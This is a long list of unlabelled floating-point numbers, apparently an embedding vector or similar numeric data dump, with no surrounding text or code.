0.03992663696408272, -0.030757440254092216, -0.010982726700603962, -0.06998768448829651, -0.0022505884990096092, -0.022937504574656487, -0.012767238542437553, 0.0036125483456999063, 0.024228736758232117, 0.013630478642880917, -0.014986997470259666, -0.021385125815868378, -0.010199283249676228, 0.04189975559711456, -0.02373545803129673, 0.04999534785747528, -0.0183383971452713, 0.01127289142459631, 0.043988943099975586, 0.0004028299590572715, -0.010402398183941841, -0.00855985376983881, 0.004406873602420092, 0.016844050958752632, -0.00498357554897666, 0.029625797644257545, -0.01851249672472477, -0.005371670704334974, 0.003275232156738639, 0.006800731178373098, -0.016292737796902657, 0.02492513321340084, -0.05173633247613907, 0.0015079487347975373, -0.00019869468815159053, 0.004635378252714872, -0.020340533927083015, 0.02624538168311119, -0.004475787747651339, -0.010279078036546707, -0.009212723933160305, -0.006365484092384577, 0.009647970087826252, 0.004341586492955685, -0.008929813280701637, 0.0001928007259266451, 0.010133995674550533, 0.0066048698499798775, 0.013354822061955929, -0.021776847541332245, 0.008081082254648209, 0.01867208629846573, 0.015306178480386734, 0.010155757889151573, -0.001969491597265005, -0.016698967665433884, 0.016844050958752632, 0.018091758713126183, -0.03705400973558426, -0.04091319814324379, 0.0150740472599864, -0.006405381951481104, -0.013623224571347237, 0.01048219297081232, -0.012353754602372646, 0.026593578979372978, 0.0022796050179749727, 0.005418822634965181, -0.006960321683436632, 0.0013465447118505836, 0.02366291731595993, -0.019092826172709465, 0.0022324533201754093, -0.011606580577790737, -0.010046946816146374, -0.02904546819627285, -0.007138047367334366, -0.020848320797085762, -0.009263502433896065, -0.019412007182836533, 0.006147861015051603, 0.04250910133123398, 0.012128877453505993, 0.0034565848764032125, 0.030902521684765816, 0.003135590348392725, -0.009082149714231491, 0.02113848552107811, 0.01693109981715679, -0.0052265883423388, -0.0173808541148901, 0.03827270120382309, 0.04073910042643547, -0.03348498418927193, -0.047093700617551804, -0.01965864561498165, 0.020775780081748962, -0.002415619557723403, -0.0066665299236774445, -0.014189044944941998, 0.02914702706038952, 0.023024555295705795, 0.01967315375804901, -0.001964051043614745, 0.03322383761405945, 0.00377939292229712, 0.011403465643525124, 0.019470039755105972, -0.01115682628005743, -0.01252059917896986, 0.00785620417445898, -0.02650652825832367, 0.013746543787419796, 0.025998741388320923, 0.0065395827405154705, 0.03313678875565529, 0.006350975949317217, -0.009089403785765171, -0.020035861060023308, 0.0065976157784461975, -0.0145952757447958, 0.004900153260678053, -0.021428650245070457, -0.035022858530282974, -0.017598478123545647, 0.03470367565751076, 0.025882676243782043, 0.011541293933987617, -0.016408802941441536, -0.011729900725185871, -0.02377898246049881, 0.014682324603199959, -0.008175385184586048, 0.04720976948738098, -0.006866017822176218, 0.0067173088900744915, 0.0010346178896725178, -0.006847882643342018, 0.0002495868247933686, 0.053245190531015396, -0.028465138748288155, -0.017787085846066475, 0.00364881893619895, 0.01867208629846573, 0.016524869948625565, 0.003971626982092857, -0.02122553437948227, 0.01255686953663826, 0.022226601839065552, 0.021863896399736404, -0.010496702045202255, -0.016742492094635963, -0.035022858530282974, -0.028363581746816635, 0.027260957285761833, -0.005618310533463955, -0.0024283144157379866, 0.0009575429139658809, -0.003859188174828887, 0.011845966801047325, -0.009582683444023132, -0.00990911852568388, 0.024286771193146706, -0.014493717812001705, -0.009582683444023132, -0.0012613089056685567, 0.010997235774993896, -0.00913292821496725, -0.004163860809057951, -0.020340533927083015, 0.014305111020803452, -0.0007217842503450811, 0.012346500530838966, -0.01719224825501442, -0.0051504201255738735, 0.003518244717270136, 0.01128739956766367, 0.01253510732203722, 0.012281212955713272, -0.009974405169487, 0.02921956777572632, -0.02242971770465374, 0.00365244597196579, -0.009365060366690159, 0.0015442193252965808, 0.0002102559374179691, 0.027391530573368073, 0.019528072327375412, 0.010953710414469242, -0.028334565460681915, -0.014464701525866985, 0.0014100181870162487, 0.032295312732458115, -0.001015575835481286, -0.022792423143982887, 0.011018997989594936, -0.004040541127324104, -0.0059411185793578625, 0.03220826014876366, 0.006122471299022436, -0.014319619163870811, 0.03145383298397064, 0.01961512118577957, 0.033746134489774704, -0.020645204931497574, -0.022937504574656487, -0.000009676873560238164, 0.021385125815868378, -0.028595713898539543, -0.007275875192135572, -0.020514631643891335, -0.03528400510549545, 0.025781117379665375, -0.023097096011042595, 0.016669951379299164, 0.01735183782875538, -0.020616188645362854, -0.025607019662857056, 0.025984233245253563, 0.02250225841999054, -0.021805863827466965, -0.007464482448995113, 0.01846897229552269, 0.016278229653835297, -0.009473871439695358, -0.009074895642697811, 0.03786646947264671, -0.002381162717938423, 0.005128657910972834, 0.012397279031574726, -0.0019839999731630087, 0.007246858906000853, 0.006764460355043411, -0.004022405482828617, -0.011417973786592484, -0.017975691705942154, 0.021863896399736404, 0.018091758713126183, -0.022690866142511368, -0.0012268518330529332, 0.017598478123545647, 0.009227232076227665, -0.03481974080204964, -0.0032734184060245752, 0.006800731178373098, -0.005850442219525576, 0.016815034672617912, -0.004570091143250465, 0.011584818363189697, 0.0034747200552374125, -0.008371246047317982, 0.016176672652363777, -0.010358873754739761, 0.028262024745345116, 0.02124004252254963, -0.018904218450188637, 0.030612356960773468, -0.00866141077131033, 0.00039580254815518856, 0.011715392582118511, 0.015277162194252014, 0.01390613429248333, -0.012723714113235474, 0.0035400071647018194, 0.03220826014876366, -0.008081082254648209, 0.0053354003466665745, 0.016481345519423485, -0.006938559003174305, 0.02752210572361946, -0.012157893739640713, 0.0024609577376395464, -0.016786018386483192, 0.0173083133995533, 0.044075991958379745, -0.0045991078950464725, 0.011106046847999096, -0.013644986785948277, 0.0052628591656684875, -0.0066592758521437645, 0.012963100336492062, -0.014486463740468025, 0.025824641808867455, -0.037663355469703674, 0.015407736413180828, -0.024069147184491158, 0.022096028551459312, 0.006974829826503992, -0.012295722030103207, -0.021747831255197525, 0.011925761587917805, -0.007235977798700333, -0.0032969943713396788, -0.0583811029791832, -0.005846815183758736, -0.016191180795431137, -0.040419917553663254, 0.020238975062966347, 0.0024446360766887665, 0.028653746470808983, 0.0000010236517482553609, -0.026100298389792442, 0.0071924529038369656, 0.02524431422352791, -0.011323670856654644, -0.0016920218477025628, 0.009256248362362385, -0.024228736758232117, -0.001167005393654108, 0.03963647410273552, -0.018106266856193542, 0.005556650459766388, -0.010308094322681427, -0.016307245939970016, -0.01704716496169567, -0.046774521470069885, 0.014841915108263493, 0.020659713074564934, 0.03258547559380531, 0.020877337083220482, -0.007979524321854115, -0.020761271938681602, -0.01971668004989624, -0.022734390571713448, 0.015451260842382908, 0.016524869948625565, 0.01587199978530407, 0.02517177164554596, -0.00007928518607513979, 0.037547290325164795, 0.006151488050818443, -0.012165147811174393, -0.041696641594171524, -0.013187977485358715, -0.018802661448717117, -0.04390189051628113, -0.005041608586907387, -0.0007430932018905878, 0.02512824721634388, 0.03304973989725113, 0.025998741388320923, 0.012186910025775433, -0.0020075757056474686, 0.015451260842382908, -0.0036760217044502497, -0.013304043561220169, -0.006583107635378838, 0.043002381920814514, 0.008001286536455154, -0.005175809841603041, 0.03609646484255791, -0.00247909314930439, 0.0037503764033317566, -0.012803509831428528, 0.005085133481770754, -0.021646274253726006, -0.007442719768732786, -0.01974569633603096, 0.015045030042529106, -0.024127179756760597, -0.05025649443268776, -0.023314720019698143, 0.010235553607344627, -0.008871780708432198, -0.010308094322681427, -0.030090060085058212, -0.008189893327653408, -0.011592072434723377, 0.03540007025003433, 0.013166215270757675, -0.0302931759506464, 0.007674851454794407, -0.021863896399736404, 0.0053426544182002544, 0.040158770978450775, -0.05370945483446121, -0.033775150775909424, -0.01990528590977192, 0.0009203656227327883, 0.004109455272555351, 0.009597191587090492, 0.006347348913550377, -0.03850483149290085, -0.029799897223711014, 0.0007371992105618119, 0.03278858959674835, 0.00010229432518826798, -0.03406531363725662, -0.01703265681862831, -0.0013238756218925118, -0.007689360063523054, -0.0066121239215135574, 0.032237280160188675, -0.019194383174180984, -0.024881606921553612, -0.01584298349916935, 0.01858503744006157, 0.006361857056617737, 0.010743341408669949, 0.01591552421450615, 0.010656291618943214, 0.009510141797363758, 0.013318551704287529, 0.028668254613876343, -0.01253510732203722, 0.0066084968857467175, -0.0448884516954422, -0.009067641571164131, -0.017569461837410927, -0.012963100336492062, -0.03203416243195534, -0.004142098594456911, -0.0037612575106322765, 0.005781528074294329, -0.008472803980112076, -0.0172357726842165, -0.041435495018959045, -0.0019803729373961687, -0.0209063533693552, -0.0065939887426793575, 0.006586734671145678, -0.009024116210639477, 0.03325285390019417, 0.00728675676509738, 0.020267991349101067, -0.0014852796448394656, 0.0021454039961099625, 0.006851509679108858, 0.025403903797268867, -0.03287564218044281, 0.002042032778263092, 0.033717118203639984, 0.00781993381679058, -0.01857052929699421, -0.005767019931226969, 0.020659713074564934, -0.0014725849032402039, -0.008966083638370037, 0.012201418168842793, -0.04259615018963814, 0.03444252908229828, 0.0044213817454874516, -0.045613862574100494, 0.006866017822176218, 0.007754646707326174, 0.014870931394398212, -0.026608087122440338, -0.018207823857665062, -0.008864525705575943, 0.04456926882266998, -0.01720675639808178, 0.03537105396389961, -0.00500171072781086, -0.005545769352465868, -0.023140620440244675, -0.006746325176209211, -0.042857300490140915, -0.000872760487254709, -0.014740358106791973, 0.014653308317065239, -0.005531261209398508, 0.01385535579174757, 0.007979524321854115, -0.013623224571347237, -0.03319482132792473, 0.014812898822128773, -0.002259656321257353, -0.0045991078950464725, 0.016379786655306816, 0.029509732499718666, -0.025636035948991776, -0.020529139786958694, -0.01593003235757351, -0.008276943117380142, -0.005752511788159609, -0.02502669021487236, 0.00858887005597353, 0.03162793442606926, -0.012897812761366367, 0.011106046847999096, -0.00854534562677145, 0.019426515325903893, 0.028378089889883995, -0.026709644123911858, 0.025360379368066788, -0.010192029178142548, 0.01851249672472477, 0.009357806295156479, -0.005077878944575787, 0.017961183562874794, -0.011026252061128616, -0.010620021261274815, 0.011744408868253231, 0.001962237525731325, -0.005777901038527489, -0.007798171602189541, -0.007348416373133659, 0.012861542403697968, -0.024533409625291824, 0.029451699927449226, -0.00004375136995804496, -0.002849052892997861, 0.034906793385744095, -0.01839643158018589, -0.027377022430300713, 0.037808436900377274, -0.01862856186926365, 0.002557074883952737, 0.016220197081565857, -0.004406873602420092, -0.019310448318719864, -0.006862390786409378, 0.002043846296146512, -0.02361939288675785, 0.015233637765049934, 0.005132284946739674, -0.0030122704338282347, -0.013071911409497261, 0.01594454050064087, 0.010228299535810947, 0.002100065816193819, -0.013681257143616676, 0.02360488474369049, -0.0374022051692009, 0.004229147918522358, -0.022995539009571075, 0.020209958776831627, -0.04857354238629341, -0.026158330962061882, 0.007500752806663513, 0.008813747204840183, 0.00857436191290617, -0.008806493133306503, -0.01460978388786316, -0.0004234588413964957, 0.0024319414515048265, 0.006097082048654556, 0.007181571796536446, -0.013362076133489609, -0.016220197081565857, 0.023082587867975235, 0.0044866688549518585, 0.04204484075307846, -0.026767676696181297, -0.02256029099225998, -0.01381183136254549, -0.014406668953597546, -0.008356737904250622, 0.0078489501029253, -0.019397499039769173, -0.011323670856654644, -0.01572691649198532, 0.010046946816146374, -0.0020909979939460754, -0.008255180902779102, -0.020195450633764267, -0.014210807159543037, 0.023039063438773155, 0.0009602631907910109, -0.0051649282686412334, 0.038794998079538345, 0.02103692851960659, 0.00023077147488947958, 0.0028019011951982975, 0.01259313989430666, -0.0037358682602643967, 0.041435495018959045, 0.002197996247559786, -0.027420546859502792, -0.01376105286180973, 0.01328953541815281, 0.011824204586446285, 0.008835509419441223, -0.00262054824270308, -0.021805863827466965, 0.045439764857292175, 0.014334127306938171, -0.009060387499630451, -0.03171498328447342, -0.03722810745239258, -0.026999808847904205, -0.010141249746084213, 0.0012205045204609632, 0.010445922613143921, -0.010946456342935562, -0.046629440039396286, 0.0022197586949914694, 0.06221127510070801, 0.021704306825995445, 0.03455859422683716, -0.012114368379116058, 0.008821001276373863, -0.005846815183758736, -0.015567326918244362, 0.023532342165708542, -0.02923407591879368, -0.0036089213099330664, -0.01864307001233101, -0.011882237158715725, 0.010649037547409534, 0.006739071104675531, 0.008291451260447502, -0.03734417259693146, 0.004450398497283459, -0.016771510243415833, 0.016191180795431137, -0.006786222569644451, -0.011947523802518845, 0.006140606477856636, 0.013137198984622955, -0.02910350076854229, 0.008987845852971077, -0.0019495429005473852, 0.009089403785765171, 0.01125838328152895, -0.003144657937809825, 0.007950508035719395, 0.0015786763979122043, -0.012948592193424702, 0.0005943838623352349, -0.006347348913550377, -0.006180504336953163, 0.014805644750595093, -0.0038301716558635235, -0.012092606164515018, 0.01568339206278324, -0.014849169179797173, -0.004874764010310173, -0.021646274253726006, 0.006379992235451937, -0.0173083133995533, 0.010910185985267162, -0.006927677895873785, 0.027057841420173645, 0.00868317298591137, -0.007069133222103119, -0.010620021261274815, 0.016553886234760284, -0.006902288645505905, 0.00916194450110197, 0.025940708816051483, 0.00188244238961488, 0.026100298389792442, 0.01732282154262066, 0.007994032464921474, -0.0028236634097993374, -0.024475377053022385, 0.012020065449178219, -0.00020538207900244743, -0.019528072327375412, -0.000807020056527108, 0.011650105938315392, 0.012353754602372646, -0.012730968184769154, 0.02254578284919262, 0.023343736305832863, 0.020746763795614243, 0.009314280934631824, 0.013086419552564621, 0.0022106908727437258, -0.010337111540138721, 0.018120774999260902, 0.03142481669783592, 0.0315408818423748, 0.0368218794465065, -0.014348635450005531, -0.009103911928832531, 0.03940434381365776, -0.007203334476798773, -0.0073302811942994595, 0.036154501140117645, 0.024141687899827957, 0.0034402632154524326, -0.008465549908578396, -0.029741862788796425, 0.005393432918936014, -0.030757440254092216, -0.003721359884366393, 0.024098163470625877, 0.01252785325050354, -0.01587199978530407, 0.00008217550202971324, -0.0007612284971401095, 0.020180942490696907, -0.0009076708811335266, -0.007711122278124094, 0.0030140839517116547, 0.004142098594456911, -0.011933015659451485, 0.008124606683850288, -0.01843995600938797, 0.002551634330302477, 0.00499445665627718, 0.0007934186141937971, 0.012701951898634434, 0.007029235363006592, -0.009452109225094318, -0.0075732939876616, -0.017554953694343567, 0.012128877453505993, -0.018889710307121277, 0.012223180383443832, 0.01127289142459631, -0.006797104142606258, -0.005019846372306347, 0.0058105443604290485, -0.014783882535994053, -0.025578003376722336, -0.03783745318651199, 0.00863239448517561, -0.01326777320355177, 0.01855602115392685, -0.008030302822589874, -0.002843612339347601, -0.02504119835793972, -0.00523384241387248, 0.0009294332121498883, 0.01129465363919735, 0.003489228431135416, 0.021414142102003098, -0.031018586829304695, 0.009618953801691532, -0.027391530573368073, 0.014384905807673931, -0.015538309700787067, 0.005092387553304434, 0.0037467493675649166, -0.005690851714462042, 0.007616818882524967, 0.024185212329030037, 0.029553256928920746, 0.0026568188332021236, -0.005175809841603041, -0.0019132723100483418, 0.0006401754799298942, 0.025795625522732735, 0.03699597716331482, -0.009785798378288746, -0.024736525490880013, 0.021791355684399605, 0.016321754083037376, -0.003148284973576665, 0.005850442219525576, 0.013253264129161835, -0.01846897229552269, 0.002983253914862871, -0.009408584795892239, -0.002854493446648121, 0.012861542403697968, 0.03162793442606926, -0.013311297632753849, 0.004091319628059864, 0.008327721618115902, 0.013637732714414597, -0.024533409625291824, -0.006960321683436632, -0.024794558063149452, 0.01701814867556095, -0.014769374392926693, -0.020862828940153122, -0.017758069559931755, -0.004784087650477886, -0.007493498735129833, -0.022067012265324593, 0.024489885196089745, -0.016191180795431137, -0.011519531719386578, 0.005360789597034454, 0.010852153412997723, -0.017583969980478287, 0.001596811693161726, 0.02096438594162464, -0.0321212112903595, 0.023372752591967583, 0.0013057403266429901, -0.006481550168246031, 0.007790917530655861, 0.001823502709157765, 0.024867098778486252, -0.0005685411160811782, -0.033717118203639984, -0.0028236634097993374, -0.01735183782875538, 0.024301279336214066, 0.016713475808501244, 0.01838192157447338, -0.0019150858279317617, -0.018744628876447678, 0.011548548005521297, 0.024185212329030037, -0.011766171082854271, 0.008900796994566917, -0.03412334620952606, -0.0052157072350382805, -0.00858887005597353, 0.01328228134661913, -0.01584298349916935, -0.0032661643344908953, 0.009568175300955772, 0.009814814664423466, -0.0099018644541502, -0.030873505398631096, 0.004918288439512253, 0.006688292138278484, -0.044453203678131104, 0.021776847541332245, 0.004062303341925144, 0.00988735631108284, -0.014413923025131226, 0.003422127803787589, 0.006934931967407465, 0.007355670444667339, 0.015277162194252014, 0.028174975886940956, -0.03342695161700249, -0.002849052892997861, 0.02377898246049881, -0.01961512118577957, 0.006695546209812164, -0.005723495036363602, 0.0002919780381489545, 0.008458295837044716, 0.0016847677761688828, -0.0030884386505931616, -0.004530193749815226, 0.017642002552747726, -0.04494648426771164, -0.008893542923033237, -0.01566888391971588, 0.00040940401959232986, 0.021414142102003098, 0.006053557153791189, -0.0002638683654367924, 0.0020783033687621355, 0.003637937596067786, -0.019542580470442772, 0.01859954558312893, -0.015378720127046108, 0.005861323326826096, -0.005618310533463955, 0.021762339398264885, -0.01967315375804901, 0.023024555295705795, 0.01600257307291031, -0.019179875031113625, 0.03458761051297188, -0.014116504229605198, 0.010141249746084213, -0.03278858959674835, -0.009807560592889786, 0.0037286141887307167, -0.010511210188269615, 0.011359941214323044, -0.014986997470259666, 0.01848348043859005, 0.003989762160927057, 0.007486244663596153, -0.013151707127690315, 0.01843995600938797, -0.010061454959213734, -0.0005395246553234756, -0.009618953801691532, -0.0009611700079403818, -0.002678581280633807, -0.022023487836122513, -0.02248775027692318, 0.0049690674059093, 0.011142317205667496, 0.046861570328474045, -0.002542566740885377, -0.00998165924102068, -0.015291670337319374, -0.005694478750228882, 0.00047242411528714, -0.01858503744006157, -0.0067173088900744915, -0.0156253594905138, -0.021950945258140564, 0.037692371755838394, -0.009038625285029411, 0.0026404971722513437, 0.01606060564517975, 0.022952014580368996, -0.022125044837594032, -0.006340094842016697, -0.021646274253726006, -0.018715612590312958, 0.0003046727506443858, 0.028131449595093727, 0.030003011226654053, -0.0005567531916312873, -0.013449125923216343, 0.033630069345235825, -0.011715392582118511, -0.02364840917289257, -0.004889272153377533, -0.013158961199223995, 0.00867591891437769, 0.006851509679108858, -0.011729900725185871, -0.0172357726842165, -0.027217432856559753, -0.018817169591784477, -0.021907420828938484, -0.014508225955069065, -0.015465768985450268, -0.024098163470625877, 0.0035418206825852394, 0.006927677895873785, -0.006557718385010958, -0.03215022757649422, -0.01720675639808178, 0.009539159014821053, 0.021370617672801018, 0.008095590397715569, -0.01976020447909832, -0.018773645162582397, 0.0035472612362354994, 0.019266923889517784, 0.011947523802518845, 0.026187347248196602, 0.0198037289083004, -0.009270756505429745, 0.01732282154262066, -0.008835509419441223, 0.0013610529713332653, -0.010924694128334522, -0.012339246459305286, 0.0156979002058506, 0.00630382401868701, 0.026970792561769485, 0.007994032464921474, -0.014232569374144077, 0.0072613670490682125, 0.005534888245165348, 0.014776628464460373, 0.004686157219111919, -0.005611056461930275, 0.005774274002760649, -0.02646300382912159, 0.004834866151213646, -0.008538090623915195, 0.023503325879573822, -0.012745476327836514, 0.01845446415245533, 0.02116750180721283, 0.017714543268084526, -0.006829747464507818, -0.018889710307121277, -0.014972489327192307, -0.012186910025775433, -0.026143822818994522, 0.00855985376983881, 0.03017711080610752, -0.012411787174642086, 0.020456599071621895, -0.028029892593622208, -0.0028798829298466444, 0.0015677951741963625, -0.005567531567066908, 0.0170906912535429, 0.004805849865078926, -0.011084284633398056, 0.00758054805919528, 0.0025044826325029135, -0.011425227858126163, 0.017525937408208847, -0.005070624873042107, 0.0010754222748801112, -0.0011978354305028915, -0.00865415669977665, 0.00030965995392762125, 0.002624175511300564, -0.026869235560297966, 0.009423092938959599, -0.007725630421191454, -0.0029034586623311043, 0.0005164021858945489, -0.02228463441133499, -0.016466837376356125, 0.01848348043859005, -0.011831458657979965, 0.01460252981632948, -0.0011914881179109216, -0.0104531766846776, -0.006757206283509731, -0.005030727479606867, 0.0038918317295610905, -0.001457170001231134, 0.01740987040102482, 0.010170266963541508, 0.02633243054151535, 0.007188825868070126, 0.004007897339761257, -0.018178807571530342, 0.016176672652363777, 0.01845446415245533, 0.01118584256619215, -0.010010676458477974, -0.00914018228650093, -0.022835947573184967, -0.020021352916955948, 0.00916919857263565, 0.04332156479358673, -0.003710478777065873, -0.004138471558690071, 0.023314720019698143, -0.014072978869080544, 0.004221893846988678, -0.026999808847904205, -0.0150740472599864, 0.03542908653616905, 0.0012685629772022367, 0.0016902083298191428, -0.02897292748093605, -0.003344146069139242, -0.006379992235451937, -0.011026252061128616, 0.0013293161755427718, 0.007711122278124094, 0.0321212112903595, 0.0066665299236774445, 0.015378720127046108, -0.013652240857481956, -0.009807560592889786, 0.005114149767905474, -0.018991267308592796, 0.0001496160839451477, -0.008465549908578396, -0.03348498418927193, 0.01128014549612999, -0.006441652309149504, -0.021849388256669044, -0.0046789031475782394, 0.006438025273382664, -0.03316580504179001, 0.0013420109171420336, 0.021892912685871124, 0.025607019662857056, 0.002049286849796772, -0.00914743635803461, -0.0013347568456083536, -0.003289740299805999, 0.011091538704931736, -0.0059918975457549095, -0.024620460346341133, 0.028682762756943703, 0.005455092992633581, -0.0029506105929613113, 0.028610222041606903, -0.008262434974312782, 0.024852590635418892, 0.009604445658624172, 0.002916153520345688, 0.006771714426577091, -0.00041212429641745985, -0.006401754915714264, -0.004319824278354645, 0.01508855540305376, 0.008255180902779102, -0.014131012372672558, -0.006510566454380751, -0.010300840251147747, -0.004381484352052212, -0.0046099890023469925, -0.004337959457188845, -0.012404533103108406, 0.02882784605026245, 0.01380457729101181, -0.01854151301085949, 0.0039571188390254974, -0.006198639515787363, 0.04207385703921318, 0.0028236634097993374, -0.0013320364523679018, 0.000656497257295996, -0.012658427469432354, -0.010989981703460217, 0.01606060564517975, -0.0006356416852213442, 0.007471736520528793, 0.0037576304748654366, 0.0025915319565683603, 0.0276526790112257, 0.02260381542146206, -0.004290807992219925, -0.02113848552107811, -0.009241740219295025, -0.0053390273824334145, 0.020180942490696907, 0.006082573905587196, -0.003501923056319356, -0.007159809581935406, -0.021791355684399605, 0.014319619163870811, 0.00524109648540616, -0.009292518720030785, -0.00758780213072896, 0.002127268584445119, -0.00006936745921848342, 0.013739289715886116, 0.0011334551963955164, 0.0005871297908015549, -0.008429279550909996, -0.012397279031574726, -0.027173908427357674, -0.029698338359594345, 0.013739289715886116, 0.012114368379116058, 0.016147656366229057, -0.013093673624098301, -0.00393172912299633, -0.005121403839439154, 0.01120035070925951, 0.00008580255234846845, 0.001025550183840096, -0.000578515522647649, 0.009263502433896065, 0.006115217227488756, -0.00497994851320982, -0.0018452650401741266, -0.01118584256619215, 0.016437821090221405, 0.019948810338974, -0.0016811407404020429, 0.006448906380683184, -0.012281212955713272, 0.00492554297670722, -0.03020612709224224, 0.012295722030103207, -0.013536174781620502, -0.0026677001733332872, -0.01610413007438183, -0.010133995674550533, -0.01505953911691904, -0.017583969980478287, 0.03252744302153587, -0.010075963102281094, 0.01829487271606922, -0.004399619530886412, -0.005919356364756823, 0.0022397073917090893, 0.01519011240452528, 0.010605513118207455, 0.006430771201848984, -0.0001355612330371514, -0.002930661663413048, -0.006702800281345844, -0.0012567751109600067, 0.037460241466760635, -0.016771510243415833, 0.006637513637542725, -0.00010694149386836216, -0.006800731178373098, 0.010924694128334522, -0.010953710414469242, -0.0020112027414143085, -0.004185623023658991, -0.007109030615538359, -0.01047493889927864, -0.013035641051828861, -0.004664394538849592, 0.00755878584459424, 0.004580972250550985, -0.009560921229422092, 0.004160233773291111, 0.0036071077920496464, -0.0003939890011679381, -0.0008500913972966373, -0.01740987040102482, -0.010743341408669949, -0.0075370236299932, -0.03043825924396515, 0.005179436877369881, -0.0052193342708051205, 0.0022106908727437258, -0.007928745821118355, 0.012847034260630608, 0.00914743635803461, -0.010569242760539055, 0.014254332520067692, -0.004907407332211733, -0.014392159879207611, -0.013224247843027115, -0.007660343311727047, -0.005741630680859089, 0.014399413950741291, -0.009053133428096771, 0.008327721618115902, -0.006840628571808338, 0.0014290602412074804, -0.007711122278124094, 0.01694560796022415, 0.04108729586005211, 0.023401768878102303, -0.0319761298596859, -0.007986778393387794, 0.008146368898451328, -0.029625797644257545, -0.004356095101684332, 0.01460978388786316, 0.012781747616827488, 0.019107334315776825, 0.03032219223678112, 0.010895677842199802, -0.020180942490696907, -0.023372752591967583, 0.009814814664423466, 0.005839561112225056, 0.006746325176209211, 0.0015696086920797825, -0.016495853662490845, 0.01836741343140602, 0.012157893739640713, -0.026187347248196602, 0.03145383298397064, -0.010271823965013027, 0.013013878837227821, -0.006129725370556116, 0.029973994940519333, -0.0031047603115439415, 0.014537242241203785, 0.034964825958013535, -0.007406449411064386, -0.03151186555624008, 0.010380635969340801, 0.016553886234760284, -0.005447838921099901, -0.018193315714597702, 0.01600257307291031, 0.01565437577664852, -0.01571240834891796, -0.002752935979515314, 0.014747612178325653, 0.012796255759894848, 0.01825134828686714, -0.0008682266343384981, 0.020790288224816322, 0.007163436617702246, 0.0183383971452713, 0.006151488050818443, -0.01252059917896986, 0.00013363437028601766, -0.028305549174547195, -0.013557936996221542, 0.008422025479376316, -0.0034674659837037325, 0.00854534562677145, 0.006927677895873785, -0.005632818676531315, 0.013935151509940624, -0.004570091143250465, 0.022763406857848167, -0.002203436801210046, 0.006691919174045324, 0.019455531612038612, -0.002118200995028019, -0.0027094113174825907, 0.016394294798374176, -0.023213161155581474, 0.022835947573184967, 0.005625564604997635, -0.008146368898451328, 0.006793477106839418, -0.016510361805558205, -0.02247324213385582, -0.017903150990605354, 0.00012003289884887636, -0.009365060366690159, -0.009314280934631824, 0.0156979002058506, -0.012854288332164288, -0.01130190771073103, 0.019948810338974, -0.018033724278211594, 0.00016174405755009502, -0.006967575754970312, 0.007674851454794407, -0.0019422887125983834, -0.008850017562508583, -0.0017972064670175314, 0.006833374500274658, -0.014138266444206238, -0.008052065037190914, 0.015567326918244362, 0.006162369158118963, 0.0012177842436358333, 0.013956913724541664, -0.01246256660670042, 0.009517395868897438, 0.01848348043859005, -0.004784087650477886, 0.023546850308775902, 0.017569461837410927, -0.0009983472991734743, 0.014297856949269772, -0.012861542403697968, -0.0004205118748359382, -0.007928745821118355, 0.004508431069552898, -0.00009526690701022744, 0.00524109648540616, -0.004461279604583979, -0.004327078349888325, -0.012832526117563248, 0.0038047824054956436, 0.016597410663962364, -0.00008857952343532816, 0.00376488477922976, 0.012346500530838966, -0.015219129621982574, -0.018091758713126183, 0.0035345666110515594, -0.01865757815539837, -0.02650652825832367, -0.0011407092679291964, -0.0010464057559147477, 0.036299582570791245, 0.00918370671570301, 0.018120774999260902, 0.007921491749584675, -0.000025559413188602775, -0.00041189760668203235, -0.016437821090221405, -0.022777915000915527, 0.016205688938498497, 0.007624072954058647, 0.005197572056204081, 0.004457652568817139, -0.008160877041518688, -0.017612986266613007, -0.020616188645362854, 0.0036306835245341063, -0.03023514337837696, 0.016597410663962364, -0.004802222829312086, 0.012665681540966034, -0.0051649282686412334, -0.0012758171651512384, 0.010279078036546707, 0.005175809841603041, 0.02521529607474804, 0.007979524321854115, 0.0038192905485630035, 0.011410719715058804, 0.008131860755383968, -0.006383619271218777, 0.006347348913550377, 0.010801373980939388, 0.0005445118877105415, -0.0029596781823784113, -0.0006850602803751826, 0.010387890040874481, 0.016336262226104736, 0.005411568563431501, -0.004718800541013479, 0.010982726700603962, 0.002845425857231021, 0.009285264648497105, 0.0004447677929420024, 0.026071282103657722, 0.011686376295983791, -0.0037394952960312366, 0.03127973526716232, -0.0011071589542552829, 0.0035236855037510395, 0.0065323286689817905, 0.00754427770152688, 0.0013057403266429901, 0.01130190771073103, -0.0028127823024988174, 0.007645835168659687, 0.01608962193131447, -0.0030721169896423817, 0.02363390102982521, 0.010728833265602589, 0.009053133428096771, 0.008284197188913822, -0.00860337819904089, -0.01256412360817194, -0.0044250087812542915, -0.022008979693055153, 0.009655224159359932, -0.024156196042895317, 0.00394261023029685, 0.010293586179614067, -0.000018021937648882158, 0.01835290528833866, -0.008908051066100597, 0.00500171072781086, 0.009386822581291199, 0.02374996617436409, 0.013666749000549316, -0.00866866484284401, 0.023546850308775902, -0.002118200995028019, -0.005426076706498861, -0.009568175300955772, 0.005433330778032541, -0.013434617780148983, -0.000401243130909279, -0.0032552832271903753, -0.0059338645078241825, -0.03217924386262894, 0.006057184189558029, -0.005139539018273354, -0.014406668953597546, 0.011947523802518845, 0.02389504760503769, 0.014051216654479504, -0.013623224571347237, 0.016524869948625565, -0.02489611692726612, 0.026898251846432686, -0.02131258323788643, 0.0004032833385281265, 0.0028055282309651375, -0.016263721510767937, -0.013710273429751396, -0.020543647930026054, -0.020674223080277443, -0.013021132908761501, -0.020398566499352455, 0.003844680031761527, -0.01375379879027605, -0.0018933234969154, 0.017888642847537994, -0.012651173397898674, -0.0015424058074131608, -0.022922996431589127, 0.008218910545110703, 0.010206537321209908, -0.011432481929659843, 0.012433549389243126, -0.0010881169000640512, 0.01859954558312893, -0.005389805883169174, 0.003583531826734543, 0.002843612339347601, -0.009328789077699184, -0.007754646707326174, 0.028682762756943703, -0.004657140467315912, -0.017787085846066475, 0.001099904882721603, -0.020253483206033707, 0.0010563802206888795, 0.017830610275268555, -0.008342229761183262, -0.0013438244350254536, 0.00392810208722949, -0.020848320797085762, 0.013463634066283703, -0.006898661609739065, 0.010315348394215107, -0.020804796367883682, 0.012244942598044872, -0.00857436191290617, -0.022139552980661392, 0.020674223080277443, 0.018120774999260902, -0.003844680031761527, 0.010656291618943214, -0.017685526981949806, 0.001019202871248126, -0.018788153305649757, 0.010924694128334522, 0.0022233857307583094, 0.00861788634210825, -0.02377898246049881, 0.0036941571161150932, 0.018947742879390717, -0.01178793329745531, -0.010576496832072735, 0.007177944760769606, -0.023358244448900223, -0.000872307107783854, -0.02247324213385582, 